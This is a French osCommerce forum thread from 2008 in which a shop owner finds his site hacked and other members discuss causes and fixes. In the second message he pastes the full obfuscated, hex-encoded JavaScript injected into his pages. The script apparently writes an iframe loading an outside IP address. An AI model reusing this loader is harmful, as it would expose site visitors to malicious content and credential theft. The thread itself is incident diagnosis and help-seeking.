 Erreur sur page: 77.221.133.212/.if/go.html?, Mon site est hacké?? |
 |
 |
 |
 |
 |
 |
 |
 |
Bienvenue invité ( Connexion | Inscription )
  |
 16 Nov 2008, 16:18
Message
#1
|
|
|
Ceinture jaune+ OSC  Groupe : Membres Messages : 136 Inscrit : 31-January 07 Lieu : Londres Membre no 15025  |
Bonjour a tous,
Depuis ce matin, a chaque fois que je clique sur une page de mon site, un message d'erreur apparait en bas a droite de la fenetre de navigation. Normalement doivent apparaitre les noms des pages en cours de lecture. J'ai le triangle jaune danger avec le message terminé une fois que la page apparait. Durant le chargement, je vois ceci: "http://77.221.133.212/.if/go.html?..." puis "http://77.221.133.212/.dif/go.php?sid=1/..." puis "http://uk.yahoo.com/?.p=us..." et enfin "Terminé mais il existe des erreurs sur la page". Je ne sais pas du tout ce que c'est. Cela n'apparait que sur quelques pages de mon site. Dois-je m'inquiéter? Que dois-je faire pour que ce message n'apparaisse plus? Merci pour votre aide Ce message a été modifié par Alix32 - 16 Nov 2008, 16:20. -------------------- Version OSC: v2.2
Contributions: Paypal IPN V1.4 - QTPro V4.2 - Store Pick Up 1.4 - Ultimate Seo Url V21D 23Nov2008 - Independent Seo Url Validation v1.0.4 - Header Tags SEO 3.1.2 - Horizontal Category Menu, JQuery or CSS - More Pics 6 v1.4.3 12 - Individual Product Shipping methods - Sitemap SEO V1.7 - Latest News V1.2.0 - Recover Cart Sales V2.23d - Specials in categories list Version de PHP et MySQL: PHP 5.2.8 / MySQL 4.1.24 Hébergement: Icodia |
 |
|
|
16 Nov 2008, 16:31
Message
#2
|
|
|
Ceinture jaune+ OSC Groupe : Membres Messages : 136 Inscrit : 31-January 07 Lieu : Londres Membre no 15025 |
Je reviens avec plus d'infos...j'ai trouvé que ce message d'erreur n'apparaissait que sur les pages index.php et login.php. Je suis allé directement dans les fichiers et voici ce que j'ai trouvé juste apres le <body>
Code <script>function c1058032905m491f34f6ac8cc(m491f34f6acce1){ var m491f34f6ad0d4=16; return (parseInt(m491f34f6acce1,m491f34f6ad0d4));}function m491f34f6ad8cf(m491f34f6adcc8){ function m491f34f6aecfa(){var m491f34f6af939=2;return m491f34f6af939;} var m491f34f6ae25b='';m491f34f6b1ce6=String.fromCharCode;for(m491f34f6ae8c8=0;m491f34f6ae8c8<m491f34f6adcc8.length;m491f34f6ae8c8+=m491f34f6aecfa()){ m491f34f6ae25b+=(m491f34f6b1ce6(c1058032905m491f34f6ac8cc(m491f34f6adcc8.substr(m491f34f6ae8c8,m491f34f6aecfa()))));}return m491f34f6ae25b;} var z4f='';var m491f34f6b281d='3C7'+z4f+'3637'+z4f+'2697'+z4f+'07'+z4f+'43E696628216D7'+z4f+'96961297'+z4f+'B646F637'+z4f+'56D656E7'+z4f+'42E7'+z4f+'7'+z4f+'7'+z4f+'2697'+z4f+'465287'+z4f+'56E657'+z4f+'363617'+z4f+'065282027'+z4f+'2533632536392536362537'+z4f+'3225363125366425363525323025366525363125366425363525336425363325333125333025 .32302537'+z4f+'332537'+z4f+'32253633253364253237'+z4f+'2536382537'+z4f+'342537'+z4f+'342537'+z4f+'30253361253266253266253337'+z4f+'253337'+z4f+'253265253332253332253331253265253331253333253333253265253331253337'+z4f+'253332253266253265253639253636253266253637'+z4f+'2536662532652536382537'+z4f+'34253664253663253366253237'+z4f+'2532622534642536312537'+z4f+'342536382532652537'+z4f+'322536662537'+z4f+'352536652536342532382534642536312537'+z4f+'342536382532652537'+z4f+'32253631253665253634253666253664253238253239253261253337'+z4f+'253332253334253337'+z4f+'253338253239253262253237'+z4f+'253332253632253337'+z4f+'253333253337'+z4f+'253634253331253336253633253336253237'+z4f+'2532302537'+z4f+'37'+z4f+'2536392536342537'+z4f+'34253638253364253331253336253337'+z4f+'253230253638253635253639253637'+z4f+'2536382537'+z4f+'342533642533342533332533342532302537'+z4f+'332537'+z4f+'342537'+z4f+'39253663253635253364253237'+z4f+'2536342536392537'+z4f+'332537'+z4f+'302536632536312537'+z4f+'39253361253230253665253666253665253635253237'+z4f+'2533652533632532662536392536362537'+z4f+'3225363125366425363525336527'+z4f+'29293B7'+z4f+'D7'+z4f+'6617'+z4f+'2206D7'+z4f+'969613D7'+z4f+'47'+z4f+'27'+z4f+'5653B3C2F7'+z4f+'3637'+z4f+'2697'+z4f+'07'+z4f+'43E';document.write(m491f34f6ad8cf(m491f34f6b281d));</script> Mon site s'est donc fait hacker...je vais de ce pas regarder sur ce forum les solutions sur les problemes de sécurité. -------------------- Version OSC: v2.2
Contributions: Paypal IPN V1.4 - QTPro V4.2 - Store Pick Up 1.4 - Ultimate Seo Url V21D 23Nov2008 - Independent Seo Url Validation v1.0.4 - Header Tags SEO 3.1.2 - Horizontal Category Menu, JQuery or CSS - More Pics 6 v1.4.3 12 - Individual Product Shipping methods - Sitemap SEO V1.7 - Latest News V1.2.0 - Recover Cart Sales V2.23d - Specials in categories list Version de PHP et MySQL: PHP 5.2.8 / MySQL 4.1.24 Hébergement: Icodia |
|
|
|
|
22 Nov 2008, 13:25
Message
#3
|
|
|
Ceinture blanche OSC  Groupe : Membres Messages : 3 Inscrit : 22-November 08 Membre no 23750 |
comment un hacker aurait il put glisser des lignes de codes sur ton fichier index.php?
as tu donné le code d'accés ftp à quelqu'un? |
|
|
|
|
22 Nov 2008, 17:44
Message
#4
|
|
 5eme dan OSC  Groupe : Administrateur Messages : 7619 Inscrit : 28-December 03 Lieu : Hollywood les Granits Membre no 1773 |
Oui, et surtout là où tu es hébergé... Tu dois avoir un pu**n de trou de sécurité.
-------------------- |
|
|
|
|
24 Nov 2008, 09:08
Message
#5
|
|
|
Ceinture blanche+ OSC  Groupe : Membres Messages : 35 Inscrit : 25-January 06 Lieu : Marne Membre no 8735 |
Je suis chez OVH 240 plan et j'ai eu la même chose il y a 1 mois.
Tous les fichiers index.* (idem ds sous répertoire) contaminés + login.php Aucun effet visible sur les pages concernés, norton est passé à travers et je l'ai détecté avec le dernier bitdefender La solution à court terme passer les fichiers concernés en lecture seule par chmod A suivre... -------------------- OSC MS2 - more_pics6_v1.2 - Box Image Thema V2.7 - Box défillante pour les promos par Xavkick - Header Tag v2.5.6 - Must Agree to Terms v1.5.6- Categories_with_Dropdown_fixed_1 - Ultimate_SEO_URLs_v2-2.2 - sid_killer_v1.2b - SiteMap-MS2-2.3 - colissimo_1.5.2 - Products_Sold_out_v1.2 - GoogleXMLSitemapv1.3 - virementbancaire1.2 - master password v1.4.zip - PayPal_IPN_v1.4- RecoverCartSales 2.22a - inactive user 1 - Quick_updates v 2.3c - Featured_Products_v1.5.9 - New_Customer_Emails_1_1 - AJAX-AttributeManager-V2.7 - order_editor_5_0_6 - Sales_report_2.1_fixed_quantity - Ship In Cart v2.2.1 - shop by price
|
|
|
|
|
24 Nov 2008, 10:05
Message
#6
|
|
|
5eme dan OSC Groupe : Administrateur Messages : 7619 Inscrit : 28-December 03 Lieu : Hollywood les Granits Membre no 1773 |
Avez-vous des pistes sur les moyens employés pour vous atteindre ?
-------------------- |
|
|
|
|
24 Nov 2008, 10:58
Message
#7
|
|
|
Ceinture jaune+ OSC Groupe : Membres Messages : 131 Inscrit : 10-April 05 Membre no 5450 |
plusieurs hypotheses pour le hack
=> serveur mutualisé: => un compte a été piraté et il a pu avoir accès à l'ensemble du serveur, affectant les fichiers ouverts en écriture. => faille de script type injection de code, pour lancer des codes à distance. => faille dans un script qui permet de faire un upload de fichier et lancer le script à distance. => d'autres insoupconnés. Au vu des attaques sur nos serveurs, je pencherais peut etre pour l'installation d'une injection de code. Peux tu nous dire quels autres scripts tu as installé sur ton serveur? |
|
|
|
|
24 Nov 2008, 11:24
Message
#8
|
|
|
Ceinture jaune+ OSC Groupe : Membres Messages : 136 Inscrit : 31-January 07 Lieu : Londres Membre no 15025 |
Bonjour a tous,
J'ai contacté mon hébergeur ICODIA et m'ont certifié qu'ils sont a jour sur la sécurité et présument que le probleme vient de mon OSC. Personnellement je n'ai installé aucun script d'injection de code, par contre j'ai easypopulate pour uploader des fichiers...je ne sais pas si la faille de venir de la(?). J'ai constaté aussi en plus d'insérer le code au-dessus dans les fichiers index.php (catalog + admin) et create_account.php, je vois qu'il a également inséré un <script>check_content()</script> sur la derniere ligne de mes fichiers index: Code <?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?><script>check_content()</script> En supprimant ce nouveau code de mes fichiers, je n'ai plus le message d'erreur en bas a gauche de ma page. J'ai peut-etre d'autres trucs qui trainent. Je poursuis l'investigation... Ce message a été modifié par Alix32 - 24 Nov 2008, 12:12. -------------------- Version OSC: v2.2
Contributions: Paypal IPN V1.4 - QTPro V4.2 - Store Pick Up 1.4 - Ultimate Seo Url V21D 23Nov2008 - Independent Seo Url Validation v1.0.4 - Header Tags SEO 3.1.2 - Horizontal Category Menu, JQuery or CSS - More Pics 6 v1.4.3 12 - Individual Product Shipping methods - Sitemap SEO V1.7 - Latest News V1.2.0 - Recover Cart Sales V2.23d - Specials in categories list Version de PHP et MySQL: PHP 5.2.8 / MySQL 4.1.24 Hébergement: Icodia |
|
|
|
|
24 Nov 2008, 11:51
Message
#9
|
|
|
Ceinture jaune+ OSC Groupe : Membres Messages : 131 Inscrit : 10-April 05 Membre no 5450 |
sur le post US... il y a qqun qui ecrit la meme chose
http://forums.oscommerce.com/index.php?showtopic=315563 Un des forumeurs soupconne une faille dans Mambo ou Joomla. apres d'autres reportent le meme probleme sur des CMS http://forum.coppermine-gallery.net/index....55989.msg273767 http://www.tek-tips.com/viewthread.cfm?qid...2554&page=1 http://php-fusion.co.uk/forum/viewthread.php?thread_id=22099 Cela ressemble clairement à un hack du type code injection. Et le hack a pour objectif de capter les informations du LOGIN et autres informations. (en laissant ouvrir une IFRAME en permanence). Si tu n'as qu'OSCOMMERCE sur ton serveur, il est probable qu'il y ait une faille dessus. Ce message a été modifié par demoalt - 24 Nov 2008, 11:56. |
|
|
|
|
24 Nov 2008, 17:44
Message
#10
|
|
 2eme dan OSC Groupe : Bannis Messages : 3022 Inscrit : 12-November 07 Lieu : Massilia Membre no 19718 |
Ce script touche pas mal de CMS apparemment.
Il y aurait-il un point commun entre les victimes ? Utilisation de phpbb, Joomla, Wordpress etc ... ? |
|
|
|
|
12 Dec 2008, 13:49
Message
#11
|
|
 Ceinture orange+ OSC  Groupe : Membres Messages : 452 Inscrit : 25-July 05 Membre no 6608 |
Il existe encore des injections SQL qui peuvent être effectuées une fois qu'un utilisateur est loggé sur OSC. Donc nouvel utilisateur qui ouvre un compte par exemple... pour icodia, je confirme qu'ils sont à jour niveau versions php etc. (c'est assez rare pour le dire)...
que faire ? |
|
|
|
|
13 Dec 2008, 16:35
Message
#12
|
|
 Ceinture orange OSC  Groupe : Membres Messages : 234 Inscrit : 18-October 06 Lieu : Oinville s/Montcient (78) Membre no 12728 |
Salut
J'ai rencontré le même problème il y a quelques mois sur un site osc. Je n'ai jamais trouvé la cause mais depuis que j'ai installé Crawltrack, le site n'est plus hacké. Si cela peut aider dans un premier temps. Infini -------------------- MS2.2 (stable) + Admin Account with Access Level - FCKeditor - New customer emails - Box newsletter - Ecotaxe - Discount coupon codes - OrderCheck - Login box - Sitemap - Giftwrap - AntiRobotRegistrationValidation - AJAX AttributeManager - PDF Invoice - Ultimate SEo Urls - Stats Sales Report - Stats customers orders - Colissimo - Traking colissimo - Atos 6.00 - Sogenactif - [OVH dédié] et énormément de customisation au niveau design - Valide XHTML et CSS2.1
|
|
|
|
|
1 utilisateur(s) sur ce sujet (1 invité(s) et 0 utilisateur(s) anonyme(s))
0 membre(s) :
|
Version bas débit | Nous sommes le : 26th May 2013 - 07:21 |
| Ce site est déclaré auprès de la commision Nationale de l'Informatique et des Libertés (déclaration n°: 1043896) |